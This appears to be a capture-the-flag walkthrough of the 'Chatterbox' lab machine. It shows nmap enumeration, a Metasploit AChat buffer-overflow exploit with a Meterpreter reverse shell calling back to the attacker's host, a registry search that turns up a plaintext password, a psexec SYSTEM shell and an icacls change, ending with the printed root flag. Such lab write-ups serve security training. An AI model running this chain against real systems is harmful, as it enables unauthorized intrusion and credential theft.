Chatterbox is a rather challenging box that tests the user’s ability to enumerate with NMAP, exploit a target with Metasploit, and find reused plaintext credentials to compromise the target.
Step 1: Enumerate with NMAP
As usual, the first step in our investigation is to enumerate the target with NMAP.
➜ chatterbox nmap -vv -A 10.129.3.102 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-30 17:15 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.03s elapsed
Initiating Connect Scan at 17:15
Scanning 10.129.3.102 [65535 ports]
Discovered open port 135/tcp on 10.129.3.102
Discovered open port 445/tcp on 10.129.3.102
Discovered open port 139/tcp on 10.129.3.102
Discovered open port 49155/tcp on 10.129.3.102
Discovered open port 49153/tcp on 10.129.3.102
Discovered open port 49156/tcp on 10.129.3.102
Discovered open port 49152/tcp on 10.129.3.102
Discovered open port 49157/tcp on 10.129.3.102
Discovered open port 49154/tcp on 10.129.3.102
Discovered open port 9255/tcp on 10.129.3.102
Discovered open port 9256/tcp on 10.129.3.102
Completed Connect Scan at 17:16, 40.47s elapsed (65535 total ports)
Initiating Service scan at 17:16
Scanning 11 services on 10.129.3.102
Service scan Timing: About 54.55% done; ETC: 17:18 (0:00:46 remaining)
Completed Service scan at 17:17, 59.82s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.3.102.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 9.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.01s elapsed
Nmap scan report for 10.129.3.102
Host is up, received user-set (0.045s latency).
Scanned at 2023-01-30 17:15:42 EST for 110s
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http syn-ack AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
9256/tcp open achat syn-ack AChat chat system
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h39m59s, deviation: 2h53m13s, median: 4h59m58s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-01-31T03:17:26
|_ start_date: 2023-01-31T03:14:39
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 23592/tcp): CLEAN (Couldn't connect)
| Check 2 (port 36617/tcp): CLEAN (Couldn't connect)
| Check 3 (port 11802/udp): CLEAN (Timeout)
| Check 4 (port 19481/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-01-30T22:17:23-05:00
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.71 seconds
We can see that we have a lot of open ports, but the AChat ports (9255, 9256) strike us as most interesting. Let’s see if there are any enumeration scripts we can run against this service.
Step 2: Checking for AChat version
We next load up metasploit and begin to check for anything related to AChat. We find a remote buffer overflow that may work on the target.
msf6 > search achat
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/achat_bof 2014-12-18 normal No Achat Unicode SEH Buffer Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/achat_bof
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/achat_bof) > show info
Name: Achat Unicode SEH Buffer Overflow
Module: exploit/windows/misc/achat_bof
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-12-18
Provided by:
Peter Kasza <peter.kasza@itinsight.hu>
Balazs Bucsay <balazs.bucsay@rycon.hu>
Available targets:
Id Name
-- ----
0 Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9256 yes The target port (UDP)
Payload information:
Space: 730
Avoid: 129 characters
Description:
This module exploits a Unicode SEH buffer overflow in Achat. By
sending a crafted message to the default port 9256/UDP, it's
possible to overwrite the SEH handler. Even when the exploit is
reliable, it depends on timing since there are two threads
overflowing the stack in the same time. This module has been tested
on Achat v0.150 running on Windows XP SP3 and Windows 7.
References:
https://cwe.mitre.org/data/definitions/121.html
View the full module info with the info -d command.
Step 3: Exploiting the Target
Let’s try using the exploit on the target.
msf6 exploit(windows/misc/achat_bof) > show options
Module options (exploit/windows/misc/achat_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9256 yes The target port (UDP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.173 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/achat_bof) > set rhosts 10.129.3.102
rhosts => 10.129.3.102
msf6 exploit(windows/misc/achat_bof) > set lhost tun1
lhost => tun1
msf6 exploit(windows/misc/achat_bof) > run
[-] Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
It looks like the chosen payload won't work with this exploit, let's try a different payload.
msf6 exploit(windows/misc/achat_bof) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/misc/achat_bof) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Sending stage (175686 bytes) to 10.129.3.102
[*] Meterpreter session 2 opened (10.10.16.7:4444 -> 10.129.3.102:49159) at 2023-01-30 17:29:16 -0500
meterpreter >
[*] 10.129.3.102 - Meterpreter session 2 closed. Reason: Died
Our session died immediately, but maybe we can try to quickly migrate to a different process after establishing a meterpreter connection. After a few failed attempts we are forced to reset the machine and try again as the exploits we are using seem to only work on the first try.
After several attempts we are able to connect to a meterpreter session and migrate to a more stable process. Our shell no longer crashes within seconds of running the exploit.
msf6 exploit(windows/misc/achat_bof) > exploit
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Sending stage (175686 bytes) to 10.129.57.55
[*] Meterpreter session 7 opened (10.10.16.7:4444 -> 10.129.57.55:49164) at 2023-01-30 17:42:07 -0500
meterpreter > migrate -P 1760
[*] Migrating from 852 to 1760...
[*] Migration completed successfully.
meterpreter > getuid
Server username: CHATTERBOX\Alfred
meterpreter >
We can see that we are running as the CHATTERBOX\Alfred user, and we can go grab the user flag on their desktop.
Step 4: Escalating Privileges
We now need to escalate our privileges and grab the root flag. We search for quite some time, until we find the following resource: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html. Let’s try checking the registry for any default or stored passwords.
meterpreter > shell
Process 1452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
InfoTip REG_SZ Manages users and passwords for this computer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
(Default) REG_SZ HomeGroup Password
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
(Default) REG_SZ LogonPasswordReset
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
(Default) REG_SZ changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
(Default) REG_SZ IHomeGroupPassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
(Default) REG_SZ _PasswordDeriveBytes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
(Default) REG_SZ ISupportPasswordMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
Text REG_SZ Automatic logon with current user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
(Default) REG_SZ Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password - PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
End of search: 49 match(es) found.
After carefully examining the output, we can see the DefaultPassword of Welcome1!. Could this be Alfred, or even the administrator’s, password? Let’s try using PSEXEC to connect to the victim with the Administrator’s account and our newly found password.
Step 5: Using PSEXEC to get SYSTEM Shell
We use impacket’s psexec module to connect to the target.
➜ chatterbox cd /opt/impacket
➜ impacket ls
build ChangeLog.md dist Dockerfile examples impacket impacket.egg-info LICENSE MANIFEST.in README.md requirements-test.txt requirements.txt SECURITY.md setup.py TESTING.md tests tox.ini
➜ impacket cd examples
➜ examples python3 psexec.py 'administrator':'Welcome1!'@10.129.57.55 -port 445
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.57.55.....
[*] Found writable share ADMIN$
[*] Uploading file iGypgYOf.exe
[*] Opening SVCManager on 10.129.57.55.....
[*] Creating service GCGr on 10.129.57.55.....
[*] Starting service GCGr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
Great, we have a SYSTEM shell. Now we just need to navigate to the administrator’s desktop and grab the flag.
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Administrator\Desktop
12/10/2017 06:50 PM <DIR> .
12/10/2017 06:50 PM <DIR> ..
01/30/2023 10:37 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,671,711,744 bytes free
C:\Users\Administrator\Desktop> type root.txt
Access is denied.
Despite being SYSTEM, we cannot access the root flag. Let’s jump back into our meterpreter shell and check the permissions.
Step 6: Checking and Editing Flag Permissions
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Administrator\Desktop
12/10/2017 06:50 PM <DIR> .
12/10/2017 06:50 PM <DIR> ..
01/30/2023 10:37 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,676,585,984 bytes free
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 files
It appears that only the Administrator can access this file, let’s see if we can update the permissions.
C:\Users\Administrator\Desktop>icacls root.txt /grant Alfred:F
icacls root.txt /grant Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c18d2b1ee1f8a1781a87103809d0e785
We were able to update the permissions and read the file! The only remaining step is to submit the flag.